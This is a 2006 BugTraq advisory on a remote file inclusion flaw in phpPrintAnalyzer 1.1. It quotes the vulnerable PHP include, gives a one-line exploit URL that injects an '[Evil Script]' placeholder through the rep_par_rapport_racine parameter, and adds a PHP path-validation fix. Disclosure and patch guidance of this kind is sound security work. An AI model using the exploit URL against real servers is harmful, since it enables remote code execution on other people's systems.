BugTraq
phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability Aug 07 2006 08:19PM
sh3ll sh3ll ir (1 replies)
---------------------------------------------------------------------------------------

phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion

---------------------------------------------------------------------------------------

Author : Sh3ll

Date : 2006/04/27

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

---------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpPrintAnalyzer

version : 1.1

URL : http://tpequet.free.fr/phpPrintAnalyzer

Description :

phpPrintAnalyzer is a Web Application for CUPS System to Analyze the "page_log" Files and Get HTML Graphics (with JpGraph)

---------------------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~

In index.php we found the vulnerable script:

----------------------------------------index.php--------------------------------------

....

<?php

include($rep_par_rapport_racine."inc/img.inc.php");

?>

...

---------------------------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=[Evil Script]

Solution:

~~~~~~~~

Sanitize Variable $rep_par_rapport_racine in index.php

----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Atena & N4sh3n4s

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

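Added example, not part of the original advisory and not phpPrintAnalyzer's own code: one way to apply the "Solution" above, assuming (as the advisory implies) that index.php does not set $rep_par_rapport_racine itself, so a request parameter of the same name can fill it when register_globals is on. The helper name safe_include_path and the APP_ROOT constant are hypothetical, and the layout (index.php in the application root, inc/ beneath it) is an assumption.

```php
<?php
// Added example: hardened replacement for the include in index.php.
// Assumption: this file sits in the application root and inc/ is beneath it.

// Defence in depth in php.ini (both are real directives):
//   allow_url_include = Off   ; include/require refuse URL wrappers
//   register_globals  = Off   ; removed entirely in PHP 5.4

// Fixed base directory derived from this file's location, never from the request.
define('APP_ROOT', realpath(__DIR__));

/**
 * Resolve a relative include path and confirm it stays inside APP_ROOT.
 * Hypothetical helper, not part of phpPrintAnalyzer.
 */
function safe_include_path(string $relative): string
{
    // Reject URL schemes / stream wrappers (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('Wrappers and NUL bytes are not allowed');
    }

    // realpath() collapses ../ and symlinks, and returns false for missing files.
    $resolved = realpath(APP_ROOT . DIRECTORY_SEPARATOR . $relative);
    if ($resolved === false || !is_file($resolved)) {
        throw new RuntimeException('Include target does not exist');
    }

    // The resolved path must still be below the application root.
    $prefix = APP_ROOT . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('Include target escapes the application root');
    }

    return $resolved;
}

// Before (from the advisory): the path prefix is a variable the script does not control.
// include($rep_par_rapport_racine."inc/img.inc.php");

// After: the prefix is a constant and the resolved target is validated.
require safe_include_path('inc/img.inc.php');
```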
Re: phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability Aug 14 2006 07:26PM
Carsten Eilers (ceilers-lists gmx de)


 
